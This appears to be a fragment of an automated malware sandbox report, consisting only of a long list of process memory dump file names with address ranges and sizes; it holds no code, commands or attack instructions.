                                              • memory/1980-310-0x00000000004193DE-mapping.dmp
                                              • memory/1980-317-0x0000000004A30000-0x0000000004A31000-memory.dmp
                                                Filesize

                                                4KB

                                              • memory/2056-298-0x00007FF7BF380000-0x00007FF7BF751000-memory.dmp
                                                Filesize

                                                3.8MB

                                              • memory/2056-286-0x0000000000000000-mapping.dmp
                                              • memory/2156-437-0x0000000000000000-mapping.dmp
                                              • memory/2156-248-0x0000000000000000-mapping.dmp
                                              • memory/2200-249-0x0000000000000000-mapping.dmp
                                              • memory/2200-252-0x0000000001300000-0x000000000139C000-memory.dmp
                                                Filesize

                                                624KB

                                              • memory/2200-253-0x0000000000A90000-0x0000000000A91000-memory.dmp
                                                Filesize

                                                4KB

                                              • memory/2200-267-0x00000000010D0000-0x0000000001115000-memory.dmp
                                                Filesize

                                                276KB

                                              • memory/2200-268-0x0000000002920000-0x0000000002921000-memory.dmp
                                                Filesize

                                                4KB

                                              • memory/2424-115-0x0000000000636000-0x0000000000647000-memory.dmp
                                                Filesize

                                                68KB

                                              • memory/2424-116-0x00000000001D0000-0x00000000001D9000-memory.dmp
                                                Filesize

                                                36KB

                                              • memory/2484-440-0x0000000000000000-mapping.dmp
                                              • memory/2488-209-0x0000000000000000-mapping.dmp
                                              • memory/2488-471-0x0000000000000000-mapping.dmp
                                              • memory/2536-500-0x0000000000000000-mapping.dmp
                                              • memory/2536-503-0x00007FF6D9380000-0x00007FF6D9751000-memory.dmp
                                                Filesize

                                                3.8MB

                                              • memory/2544-243-0x0000000002460000-0x0000000002461000-memory.dmp
                                                Filesize

                                                4KB

                                              • memory/2544-242-0x0000000002460000-0x0000000002461000-memory.dmp
                                                Filesize

                                                4KB

                                              • memory/2544-240-0x0000000002550000-0x0000000002565000-memory.dmp
                                                Filesize

                                                84KB

                                              • memory/2544-241-0x0000000002559A6B-mapping.dmp
                                              • memory/2644-137-0x0000000075D00000-0x0000000075DF1000-memory.dmp
                                                Filesize

                                                964KB

                                              • memory/2644-151-0x0000000004D90000-0x0000000004D91000-memory.dmp
                                                Filesize

                                                4KB

                                              • memory/2644-143-0x0000000004E80000-0x0000000004E81000-memory.dmp
                                                Filesize

                                                4KB

                                              • memory/2644-140-0x0000000072540000-0x00000000725C0000-memory.dmp
                                                Filesize

                                                512KB

                                              • memory/2644-144-0x0000000004D50000-0x0000000004D51000-memory.dmp
                                                Filesize

                                                4KB

                                              • memory/2644-146-0x0000000076250000-0x00000000767D4000-memory.dmp
                                                Filesize

                                                5.5MB

                                              • memory/2644-150-0x0000000004E70000-0x0000000004E71000-memory.dmp
                                                Filesize

                                                4KB

                                              • memory/2644-138-0x0000000000A80000-0x0000000000A81000-memory.dmp
                                                Filesize

                                                4KB

                                              • memory/2644-141-0x0000000005490000-0x0000000005491000-memory.dmp
                                                Filesize

                                                4KB

                                              • memory/2644-130-0x0000000000000000-mapping.dmp
                                              • memory/2644-152-0x0000000070790000-0x00000000707DB000-memory.dmp
                                                Filesize

                                                300KB

                                              • memory/2644-133-0x0000000000A80000-0x0000000000AE9000-memory.dmp
                                                Filesize

                                                420KB

                                              • memory/2644-134-0x0000000000660000-0x0000000000661000-memory.dmp
                                                Filesize

                                                4KB

                                              • memory/2644-136-0x00000000022F0000-0x0000000002335000-memory.dmp
                                                Filesize

                                                276KB

                                              • memory/2644-135-0x00000000773A0000-0x0000000077562000-memory.dmp
                                                Filesize

                                                1.8MB

                                              • memory/2644-142-0x0000000002BD0000-0x0000000002BD1000-memory.dmp
                                                Filesize

                                                4KB

                                              • memory/2644-147-0x00000000748B0000-0x0000000075BF8000-memory.dmp
                                                Filesize

                                                19.3MB

                                              • memory/2688-117-0x0000000000400000-0x0000000000409000-memory.dmp
                                                Filesize

                                                36KB

                                              • memory/2688-118-0x0000000000402F47-mapping.dmp
                                              • memory/2700-274-0x000000001B4B0000-0x000000001B4B2000-memory.dmp
                                                Filesize

                                                8KB

                                              • memory/2700-269-0x0000000000000000-mapping.dmp
                                              • memory/2704-328-0x0000000000000000-mapping.dmp
                                              • memory/2748-223-0x0000000003330000-0x000000000339B000-memory.dmp
                                                Filesize

                                                428KB

                                              • memory/2748-222-0x0000000003600000-0x0000000003674000-memory.dmp
                                                Filesize

                                                464KB

                                              • memory/2748-221-0x0000000000000000-mapping.dmp
                                              • memory/2752-410-0x0000000140E3C464-mapping.dmp
                                              • memory/2752-416-0x00007FF688F50000-0x00007FF689321000-memory.dmp
                                                Filesize

                                                3.8MB

                                              • memory/2836-124-0x0000000000700000-0x0000000000709000-memory.dmp
                                                Filesize

                                                36KB

                                              • memory/2836-125-0x0000000000400000-0x00000000004CD000-memory.dmp
                                                Filesize

                                                820KB

                                              • memory/2836-123-0x0000000000816000-0x0000000000827000-memory.dmp
                                                Filesize

                                                68KB

                                              • memory/2836-120-0x0000000000000000-mapping.dmp
                                              • memory/2844-212-0x00000000748B0000-0x0000000075BF8000-memory.dmp
                                                Filesize

                                                19.3MB

                                              • memory/2844-400-0x0000000000000000-mapping.dmp
                                              • memory/2844-198-0x0000000075D00000-0x0000000075DF1000-memory.dmp
                                                Filesize

                                                964KB

                                              • memory/2844-202-0x0000000072540000-0x00000000725C0000-memory.dmp
                                                Filesize

                                                512KB

                                              • memory/2844-197-0x00000000773A0000-0x0000000077562000-memory.dmp
                                                Filesize

                                                1.8MB

                                              • memory/2844-196-0x0000000000DE0000-0x0000000000DE1000-memory.dmp
                                                Filesize

                                                4KB

                                              • memory/2844-195-0x0000000000B30000-0x0000000000BCE000-memory.dmp
                                                Filesize

                                                632KB

                                              • memory/2844-205-0x0000000002D90000-0x0000000002DD5000-memory.dmp
                                                Filesize

                                                276KB

                                              • memory/2844-191-0x0000000000000000-mapping.dmp
                                              • memory/2844-238-0x0000000007300000-0x0000000007301000-memory.dmp
                                                Filesize

                                                4KB

                                              • memory/2844-218-0x0000000005930000-0x0000000005931000-memory.dmp
                                                Filesize

                                                4KB

                                              • memory/2844-199-0x0000000000B30000-0x0000000000B31000-memory.dmp
                                                Filesize

                                                4KB

                                              • memory/2844-211-0x0000000076250000-0x00000000767D4000-memory.dmp
                                                Filesize

                                                5.5MB

                                              • memory/2844-215-0x0000000070790000-0x00000000707DB000-memory.dmp
                                                Filesize

                                                300KB

                                              • memory/2844-467-0x0000000000000000-mapping.dmp
                                              • memory/2960-179-0x0000000000630000-0x000000000064C000-memory.dmp
                                                Filesize

                                                112KB

                                              • memory/2960-180-0x0000000000400000-0x00000000004D6000-memory.dmp
                                                Filesize

                                                856KB

                                              • memory/2960-153-0x0000000000000000-mapping.dmp
                                              • memory/2984-447-0x00007FF689A50000-0x00007FF689E21000-memory.dmp
                                                Filesize

                                                3.8MB

                                              • memory/2984-444-0x0000000140E3C464-mapping.dmp
                                              • memory/2988-401-0x0000000000000000-mapping.dmp
                                              • memory/2992-394-0x0000000000000000-mapping.dmp
                                              • memory/3136-247-0x0000000000000000-mapping.dmp
                                              • memory/3500-322-0x0000000000000000-mapping.dmp
                                              • memory/3536-509-0x0000000141668F54-mapping.dmp
                                              • memory/3612-387-0x00007FF6DA010000-0x00007FF6DA3E1000-memory.dmp
                                                Filesize

                                                3.8MB

                                              • memory/3612-378-0x0000000000000000-mapping.dmp
                                              • memory/3632-165-0x0000000000402F47-mapping.dmp
                                              • memory/3660-506-0x0000000000000000-mapping.dmp
                                              • memory/3672-505-0x0000000000000000-mapping.dmp
                                              • memory/3696-285-0x0000000005280000-0x0000000005886000-memory.dmp
                                                Filesize

                                                6.0MB

                                              • memory/3696-278-0x000000000041BAFE-mapping.dmp
                                              • memory/3740-188-0x0000000000000000-mapping.dmp
                                              • memory/3740-307-0x0000000000000000-mapping.dmp
                                              • memory/3776-438-0x0000000000000000-mapping.dmp
                                              • memory/3868-321-0x0000000000000000-mapping.dmp
                                              • memory/3880-244-0x0000000000400000-0x00000000004D5000-memory.dmp
                                                Filesize

                                                852KB

                                              • memory/3880-239-0x0000000000681000-0x0000000000691000-memory.dmp
                                                Filesize

                                                64KB

                                              • memory/3884-472-0x0000000000000000-mapping.dmp
                                              • memory/3968-229-0x0000000006D60000-0x0000000006D61000-memory.dmp
                                                Filesize

                                                4KB

                                              • memory/3968-204-0x0000000005780000-0x0000000005781000-memory.dmp
                                                Filesize

                                                4KB

                                              • memory/3968-213-0x0000000005960000-0x0000000005961000-memory.dmp
                                                Filesize

                                                4KB

                                              • memory/3968-228-0x0000000006660000-0x0000000006661000-memory.dmp
                                                Filesize

                                                4KB

                                              • memory/3968-177-0x0000000004B60000-0x0000000005166000-memory.dmp
                                                Filesize

                                                6.0MB

                                              • memory/3968-167-0x0000000000000000-mapping.dmp
                                              • memory/3968-207-0x0000000005D20000-0x0000000005D21000-memory.dmp
                                                Filesize

                                                4KB

                                              • memory/3968-216-0x0000000005B70000-0x0000000005B71000-memory.dmp
                                                Filesize

                                                4KB

                                              • memory/3968-201-0x0000000004FF0000-0x0000000004FF1000-memory.dmp
                                                Filesize

                                                4KB

                                              • memory/3968-170-0x00000000003C0000-0x00000000003C1000-memory.dmp
                                                Filesize

                                                4KB

                                              • memory/3968-395-0x0000000000000000-mapping.dmp
                                              • memory/3992-194-0x0000000000000000-mapping.dmp
                                              • memory/4056-338-0x0000000141668F54-mapping.dmp
                                              • memory/4056-353-0x00007FF77C9D0000-0x00007FF77CDA1000-memory.dmp
                                                Filesize

                                                3.8MB

                                              • memory/4056-342-0x0000000140000000-0x000000014166B000-memory.dmp
                                                Filesize

                                                22.4MB